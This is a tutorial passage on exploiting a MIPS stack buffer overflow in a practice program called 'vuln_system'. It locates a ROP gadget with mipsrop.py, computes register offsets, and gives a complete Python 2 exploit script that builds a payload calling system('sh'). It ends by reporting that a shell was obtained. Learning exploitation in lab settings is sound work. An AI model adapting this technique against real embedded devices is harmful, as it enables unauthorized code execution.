MIPS buffer overflow: exploit

Using the offset obtained from the analysis above, the next step is to assemble the shellcode. First, use the IDA script mipsrop.py to look for a usable ROP chain.

To jump to this ROP chain, we need to construct the command that system() will execute.

cmd == value of register A1 == $sp-relative slot used by the gadget at 0x00402060, at offset 0x58-0x40

address == register RA == offset 0x58-0x4

The value of register RA must be the code that performs the system() call. Locate do_system_0 by function name and look at the call instruction; it is at address 0x00400708, so this address is stored at offset 0x40 - 0x4 == 0x3C from the start of the command.

The assembled ROP chain (the version in the book contains an error)

Based on this, write exp.py:

#!/usr/bin/env python
# Python 2 script: builds the overflow payload described above and writes it to 'passwd'

import struct

print '[*] prepare shellcode ',
cmd = 'sh'
# NUL-terminate the command and pad it to a 4-byte boundary
cmd += "\x00"*(4-(len(cmd)%4))

shellcode = "A"*0x19c                            # filler up to the slot that reaches $a1
shellcode += struct.pack(">L", 0x00402060)       # gadget address (big-endian MIPS)
shellcode += "A"*0x18                            # 0x58 - 0x40: gap before the command
shellcode += cmd                                 # command string, read via $a1
shellcode += "B"*(0x3C-len(cmd))                 # pad so RA lands at 0x40 - 0x4 == 0x3C
shellcode += struct.pack(">L", 0x00400708)       # RA: call site of system() in do_system_0
shellcode += "CCCC"

print ' ok'

print '[+] create passwd file ',
fw = open('passwd','wb')
fw.write(shellcode)
fw.close()
print ' ok'

Run the Python script; the shellcode is written to the passwd file successfully.

Run the vuln_system program; the coveted $ prompt appears, showing that the exploit worked.
